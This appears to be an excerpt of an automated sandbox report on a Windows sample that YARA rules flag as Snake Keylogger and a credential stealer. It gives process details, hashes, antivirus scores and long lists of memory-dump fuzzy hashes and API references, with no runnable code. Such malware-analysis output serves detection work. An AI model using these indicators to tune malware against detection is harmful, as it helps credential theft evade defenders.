                                                                        Start time:08:59:29
                                                                        Start date:25/11/2024
                                                                        Path:C:\Users\user\AppData\Roaming\ishon.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\AppData\Roaming\ishon.exe"
                                                                        Imagebase:0xca0000
                                                                        File size:545'600 bytes
                                                                        MD5 hash:08565A4A256FB8F4F3497C695991829F
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.2515782521.0000000004351000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2515782521.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.2515782521.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.2515782521.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000005.00000002.2515782521.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2515782521.0000000004228000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.2515782521.0000000004228000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.2515782521.0000000004228000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000005.00000002.2515782521.0000000004228000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.2504335246.000000000326E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Antivirus matches:
                                                                        • Detection: 100%, Joe Sandbox ML
                                                                        • Detection: 55%, ReversingLabs
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Target ID:7
                                                                        Start time:08:59:44
                                                                        Start date:25/11/2024
                                                                        Path:C:\Users\user\AppData\Roaming\ishon.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\AppData\Roaming\ishon.exe"
                                                                        Imagebase:0xb60000
                                                                        File size:545'600 bytes
                                                                        MD5 hash:08565A4A256FB8F4F3497C695991829F
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.3315771924.0000000003159000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.3312269079.000000000041A000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.3315771924.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:false


                                                                          Execution Graph

                                                                          Execution Coverage:14.7%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:3.4%
                                                                          Total number of Nodes:565
                                                                          Total number of Limit Nodes:60
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ,aq$4$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                          • API String ID: 0-3443518476
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ,aq$4$$]q$$]q$$]q$$]q
                                                                          • API String ID: 0-324474496

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244533453.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_75d0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: )ce$TJbq$Te]q$paq$xb`q
                                                                          • API String ID: 0-2577628760

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244533453.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_75d0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 2$$]q
                                                                          • API String ID: 0-351713980
                                                                          • Opcode ID: 7cce97c6e1d7eff62ef5f5a005b8ac1bb3015e877827dec37a187b278cabdabc
                                                                          • Instruction ID: 2c845ccf90dbf5d607b256462a83c984d2463f0f2193f12f834700ddf98b483e
                                                                          • Opcode Fuzzy Hash: 7cce97c6e1d7eff62ef5f5a005b8ac1bb3015e877827dec37a187b278cabdabc
                                                                          • Instruction Fuzzy Hash: F6E2F3B4A012298FDB64DF69D884ADABBF5FB89301F1081EAD409A7354DB349E85CF50

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245569918.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_77f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: fbq$8
                                                                          • API String ID: 0-3186246319
                                                                          • Opcode ID: 4e41d9290657485f0b748a1f530a2c266f745115c7f8c7c1d6f962cc8b7047cd
                                                                          • Instruction ID: 2a0ce1e6024d66bb6dd0aaa9d14c888841f629c25a01c5d8fad32fd8c1852eaf
                                                                          • Opcode Fuzzy Hash: 4e41d9290657485f0b748a1f530a2c266f745115c7f8c7c1d6f962cc8b7047cd
                                                                          • Instruction Fuzzy Hash: 4552D7B5D01629CFDB64DF69C890AD9B7B1FB89300F5086EAD509A7350DB34AE81CF50
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245569918.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_77f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: fbq$h
                                                                          • API String ID: 0-3598783323
                                                                          • Opcode ID: 3af0457f870d36be4d10204fb7137e3e9a4d30b774748c74c194307a72996039
                                                                          • Instruction ID: f2c58c3bf62a0f37ae81cee067254ce20c5f9f593c5e61415277baa2afaac3d9
                                                                          • Opcode Fuzzy Hash: 3af0457f870d36be4d10204fb7137e3e9a4d30b774748c74c194307a72996039
                                                                          • Instruction Fuzzy Hash: BB7129B1E01628CBDB64DF6AC850BD9BBB2FF89310F5482AAD50DA7250DB345E85CF50
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2241633994.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_69f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (aq
                                                                          • API String ID: 0-600464949
                                                                          • Opcode ID: bcf27ec0168ad734be318def112d94b5b8c4b88b3850d8736890468fb3e6679a
                                                                          • Instruction ID: e42e8b674f1d88e7c3aa7feb174490a66f01c4a301f2f21cd29e3496fbf26f6c
                                                                          • Opcode Fuzzy Hash: bcf27ec0168ad734be318def112d94b5b8c4b88b3850d8736890468fb3e6679a
                                                                          • Instruction Fuzzy Hash: 7C327C70B013168FCB54CF69C4A466EFBF6BF88300F25892AD65AD7752DB34A801CB91
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244697649.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7620000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Te]q
                                                                          • API String ID: 0-52440209
                                                                          • Opcode ID: 54caa9c219dec806b14e40f5f8414894903c1dfaa6e8ec8a7419b1b957d0594a
                                                                          • Instruction ID: 2eb5ff3f03c03547bfdf3c605e35e59bf521b52a5d7ca34cb511559c8b8844c5
                                                                          • Opcode Fuzzy Hash: 54caa9c219dec806b14e40f5f8414894903c1dfaa6e8ec8a7419b1b957d0594a
                                                                          • Instruction Fuzzy Hash: D5223CB4A01629CFDBA4DF69C850B9DB7F2FB89300F1091A9D40AA7354DB349D86DF60
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244697649.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7620000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Te]q
                                                                          • API String ID: 0-52440209
                                                                          • Opcode ID: f13bb8f0ac693ede820907f9a2816021fc8356a566e8f7a59991d1a345a37f70
                                                                          • Instruction ID: 376c360f2fa9f567453ed37299843167920e500dca264ca81e3a42a50130601f
                                                                          • Opcode Fuzzy Hash: f13bb8f0ac693ede820907f9a2816021fc8356a566e8f7a59991d1a345a37f70
                                                                          • Instruction Fuzzy Hash: 20124CB0A05628CFDBA4DF69C850B9DB7F2FB89300F1091A9D40AA7354DB349D86DF60
                                                                          APIs
                                                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 077FE941
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245569918.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_77f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 2706961497-0
                                                                          • Opcode ID: 3a781b7ba8e9f29488e6774ac0afca33ddfe5a786aab216de21d126055f9cba1
                                                                          • Instruction ID: 0d6aa708a309f3c6ba3deeb099017ee3a831e52f6b5e67c89463896da9ecc2c8
                                                                          • Opcode Fuzzy Hash: 3a781b7ba8e9f29488e6774ac0afca33ddfe5a786aab216de21d126055f9cba1
                                                                          • Instruction Fuzzy Hash: 652126B0D012499FCB10DFAAD980AEEFBF5FF48310F208429E518A7310C775A941CBA4
                                                                          APIs
                                                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 077FE941
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245569918.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_77f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 2706961497-0
                                                                          • Opcode ID: 97ebca1aed4a4e8c1d3b927a854b5e549709f7d44686c128b266452deb70b880
                                                                          • Instruction ID: 779a90506f66264dfc6a29f5fc9173dcfab7db1d6401338792d05ee07cc522d2
                                                                          • Opcode Fuzzy Hash: 97ebca1aed4a4e8c1d3b927a854b5e549709f7d44686c128b266452deb70b880
                                                                          • Instruction Fuzzy Hash: 9121E3B1D013499FCB10DFAAD984AEEFBF5FF48310F60842AE559A7250C775A940CBA1
                                                                          APIs
                                                                          • NtResumeThread.NTDLL(?,?), ref: 069FF006
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2241633994.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_69f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          • Opcode ID: fce8d16228318502b056a5576e82cecaa3f3b8e0e0da37df287018f9a18ff06f
                                                                          • Instruction ID: c6cb4a6bcfd2dadc30862e5d1ab175232ddf04fb6c20752ce4f5bfa4d441bdb6
                                                                          • Opcode Fuzzy Hash: fce8d16228318502b056a5576e82cecaa3f3b8e0e0da37df287018f9a18ff06f
                                                                          • Instruction Fuzzy Hash: 2E2165B1D002488EDB10DFAAC484AEEFBF8FF48320F60842AD519B7200C7789844CBA4
                                                                          APIs
                                                                          • NtResumeThread.NTDLL(?,?), ref: 069FF006
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2241633994.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_69f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          • Opcode ID: 9801d21399a1f07c11d7fea4eda286279c1aeab4e0f10c1e98f311b300e78df2
                                                                          • Instruction ID: 2824dd5064fda0900cec4a0fe6dda4e4575dcf9f4a0ffc4b637fe650ac7992b0
                                                                          • Opcode Fuzzy Hash: 9801d21399a1f07c11d7fea4eda286279c1aeab4e0f10c1e98f311b300e78df2
                                                                          • Instruction Fuzzy Hash: 911117B1D002088ECB10DFAAC444AAEFBF4FF49310F64842AD519A7240CB78A944CFA5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2241633994.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_69f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: PH]q
                                                                          • API String ID: 0-3168235125
                                                                          • Opcode ID: 71bb109b27d780d6ca426badd7503d2c189c396bbbbc35a137acdc13988a2dd4
                                                                          • Instruction ID: 08f54a9428b45b929348c60b9b3d8de3c4778bb2f69ac946b2a0c31ae3835715
                                                                          • Opcode Fuzzy Hash: 71bb109b27d780d6ca426badd7503d2c189c396bbbbc35a137acdc13988a2dd4
                                                                          • Instruction Fuzzy Hash: 41D15770E15218CFEBA4DFA9D488BADBBF2FB59300F5280AAC109A7644C7749D85CF51
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244697649.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7620000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Te]q
                                                                          • API String ID: 0-52440209
                                                                          • Opcode ID: 9305a491e9b653a2abee374ab2f4e35fc96867f4ce7b5eb54ed24ca8e6ae693d
                                                                          • Instruction ID: 7f1615f3fd7445fbb4f8a725bd975c3c119cf09e622260666039031c7536d108
                                                                          • Opcode Fuzzy Hash: 9305a491e9b653a2abee374ab2f4e35fc96867f4ce7b5eb54ed24ca8e6ae693d
                                                                          • Instruction Fuzzy Hash: 9FB128B4E05668CFDB64DF69D984B9DBBF2FB4A300F109069D40AAB251DB349D86CF00
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244697649.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7620000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 7
                                                                          • API String ID: 0-1790921346
                                                                          • Opcode ID: 8ba18911230118fd3be7a7bf8c76dcd9238a134143beba82053d41da8ff23e7f
                                                                          • Instruction ID: 5227cd6a33aa35d88a568209bad199e72b1ab008e30fd53239df8693f7ee6ec3
                                                                          • Opcode Fuzzy Hash: 8ba18911230118fd3be7a7bf8c76dcd9238a134143beba82053d41da8ff23e7f
                                                                          • Instruction Fuzzy Hash: 86417EB1E15A588BEB58CF6BDC4429AFAF7BFC9201F14D1B9980DA6254EF3409469F00
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244369902.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7590000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 52a61e03b729207f2adad4cf96254a08ff1360c89684683c1d6dd5a0d8053e0c
                                                                          • Instruction ID: da7c95aa9c6c5c7c0e86d2bbedb742f10ffb9c4304933883e2214a06a1543f9e
                                                                          • Opcode Fuzzy Hash: 52a61e03b729207f2adad4cf96254a08ff1360c89684683c1d6dd5a0d8053e0c
                                                                          • Instruction Fuzzy Hash: D43289B1B012069FDB18DB69C554BAEB7F6BF89300F24446AE106DB3A4DB35ED01CB91
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244533453.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_75d0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ca507a63c7d82445c81b5bd6829afd3a188e0f9c86d3c152cff710117053d0c6
                                                                          • Instruction ID: 54e9c961fb7e8080c3fe72d79c0c26522413b2bc4846c620c65b14a3ed8d8694
                                                                          • Opcode Fuzzy Hash: ca507a63c7d82445c81b5bd6829afd3a188e0f9c86d3c152cff710117053d0c6
                                                                          • Instruction Fuzzy Hash: 0C52C5B4A056298FCB60DF28C984B9AB7F6FB89301F1085D9D90DA7355DB34AE84CF50
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244697649.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7620000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ecdc09986e6ee6b87797585e0f9d2e5046f87290e0ed7925c0e203408749a682
                                                                          • Instruction ID: 536c3c065b558bc18ff5d620b6307d1f7a782a564f47f21174ba83c66dfd53ab
                                                                          • Opcode Fuzzy Hash: ecdc09986e6ee6b87797585e0f9d2e5046f87290e0ed7925c0e203408749a682
                                                                          • Instruction Fuzzy Hash: 8CE1F9B0E01629CFDBA4CF6AD584B9DBBF2BF49304F1090AAD419A7351DB385986DF00
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244697649.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7620000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 035b3545d334af1014a6bb6921c15d196abb3dad1d12e613668f6ad73750fc3e
                                                                          • Instruction ID: 8dc52f01bf3fb9aa3c6acf61da8c238624952658f200166a56512ecc14afbb66
                                                                          • Opcode Fuzzy Hash: 035b3545d334af1014a6bb6921c15d196abb3dad1d12e613668f6ad73750fc3e
                                                                          • Instruction Fuzzy Hash: E7E1EBB0E05629CFDBA4CF6AD544B9DBBF2BF4A304F1090A9D41AA7351DB385986DF00
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245569918.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_77f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cf33d27048c275c2e5f44aeea1933618935b2f7080376dee79a1c15058d70b85
                                                                          • Instruction ID: 6e25e501187d560185dc48cbf7c8aaa4ac05485aeacd8c4ea4d92eaaff4b6a7e
                                                                          • Opcode Fuzzy Hash: cf33d27048c275c2e5f44aeea1933618935b2f7080376dee79a1c15058d70b85
                                                                          • Instruction Fuzzy Hash: CAD1F5B4E01258CFEB54DFA9D944BAEBBF2FB89304F1080A9D519A7394DB349985CF40
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245569918.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_77f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 38e1cbc0125f7bc591f6a76f666663d9beb4d25f9f6a8269bf5757f2dabcb346
                                                                          • Instruction ID: 1192b23c8a5dfd67a3dcf46f95724c852286bb478854b8fc7d49463951a8d51e
                                                                          • Opcode Fuzzy Hash: 38e1cbc0125f7bc591f6a76f666663d9beb4d25f9f6a8269bf5757f2dabcb346
                                                                          • Instruction Fuzzy Hash: 89D104B4E01258CFDB54DFAAD944BAEBBF2FB89304F1080A9D519A7394DB349985CF40
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2241633994.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_69f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f4e3294aaf6a8694e19ad481f3c95cb39c355097bc62e3258bf4ffb3a28c665a
                                                                          • Instruction ID: 323965bfa1138d7a0403e2c45fecf5ba9e96f8ff7869c1853ff6ff6a8e1db0fc
                                                                          • Opcode Fuzzy Hash: f4e3294aaf6a8694e19ad481f3c95cb39c355097bc62e3258bf4ffb3a28c665a
                                                                          • Instruction Fuzzy Hash: 55A14570E11208CFEB94DFAAD588BAEB7F2FB49300F119169D109A7690DB389D85CF40
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2241633994.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_69f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 80917d55790ad1be7b9d72e77d773592a032ad50aae6e4513669a8f5489c0998
                                                                          • Instruction ID: 5e632b3057cbf27d2104ba1bd3fe21d66e30fea827d730f290dbaa18c6a90bf3
                                                                          • Opcode Fuzzy Hash: 80917d55790ad1be7b9d72e77d773592a032ad50aae6e4513669a8f5489c0998
                                                                          • Instruction Fuzzy Hash: E5A14470E16208CFEB94DFAAD588BADB7F2FB49300F119169D109A7694CB389C85CF40
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2241633994.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_69f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 13f7a078160b2b2c640aafc4e00944be3a1891f89d3dd860062e13304c61511f
                                                                          • Instruction ID: 1a06532dc252031cfb9b29944c9fc19debac36d39a7972e0d5087ac078d78d33
                                                                          • Opcode Fuzzy Hash: 13f7a078160b2b2c640aafc4e00944be3a1891f89d3dd860062e13304c61511f
                                                                          • Instruction Fuzzy Hash: D4912370E15208CFEB94DFAAD584BADBBF2FB89300F5191A9D109A7654DB389C85CF40
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245569918.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_77f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3a78c053ce5b9c755598a3ab94b2746491d49d9ae851adc7ceb053bffdaa042f
                                                                          • Instruction ID: 280c4f6714867b1e82177ee393b9d0b9cb91484b315f4919912514c3587da691
                                                                          • Opcode Fuzzy Hash: 3a78c053ce5b9c755598a3ab94b2746491d49d9ae851adc7ceb053bffdaa042f
                                                                          • Instruction Fuzzy Hash: 0191F5B4D06208CFDB54DFAAD6847ADBBF2FB89304F14906AD509A7351DB389986CF40
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245569918.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_77f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 519611cfefb220a47b9ff7fad5697b13b52b43fb0c72619c4988681e30d8fad8
                                                                          • Instruction ID: a55332cfab8f1c935aa0ce99f53bca4dc9e9d816d47c45fb5224b58d0b9f5516
                                                                          • Opcode Fuzzy Hash: 519611cfefb220a47b9ff7fad5697b13b52b43fb0c72619c4988681e30d8fad8
                                                                          • Instruction Fuzzy Hash: 579104B0D06208CFDB54DFAAD6847ADBBF2FB89344F14906AD509A7351DB389986CF40
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245569918.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_77f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f2e2d556fa1584382b0ac55616da78ad206eb68851b9314fd6ba37a250595def
                                                                          • Instruction ID: 5d482b7e058d2d9cc758a65b152a7b8bb5c61538f21137dc0f0f976ca0481c6f
                                                                          • Opcode Fuzzy Hash: f2e2d556fa1584382b0ac55616da78ad206eb68851b9314fd6ba37a250595def
                                                                          • Instruction Fuzzy Hash: AB31F8B0E14218CFDB58CF6AC940BADBBF6BF89340F40C56AD50AA7350DB3499858F51

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Haq$Haq$Haq
                                                                          • API String ID: 0-3013282719
                                                                          • Opcode ID: 23c692af31737ea05e134de31e892e4ea79549f118e8f764275b41312b5b6d58
                                                                          • Instruction ID: 901709f35f59e417f6268e4cff6e66756585b906d1abd40d56509384d03e2bff
                                                                          • Opcode Fuzzy Hash: 23c692af31737ea05e134de31e892e4ea79549f118e8f764275b41312b5b6d58
                                                                          • Instruction Fuzzy Hash: 32127CB0A002059FCB24DFA9C494A6EB7B2FF88740F54892DD806DB765DB75EC46CB90

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4']q$4']q$4']q
                                                                          • API String ID: 0-705557208
                                                                          • Opcode ID: f246f4059dc3deea78d3dcf6154160c1acb71df7c3579b03f3e3739bbb3c443c
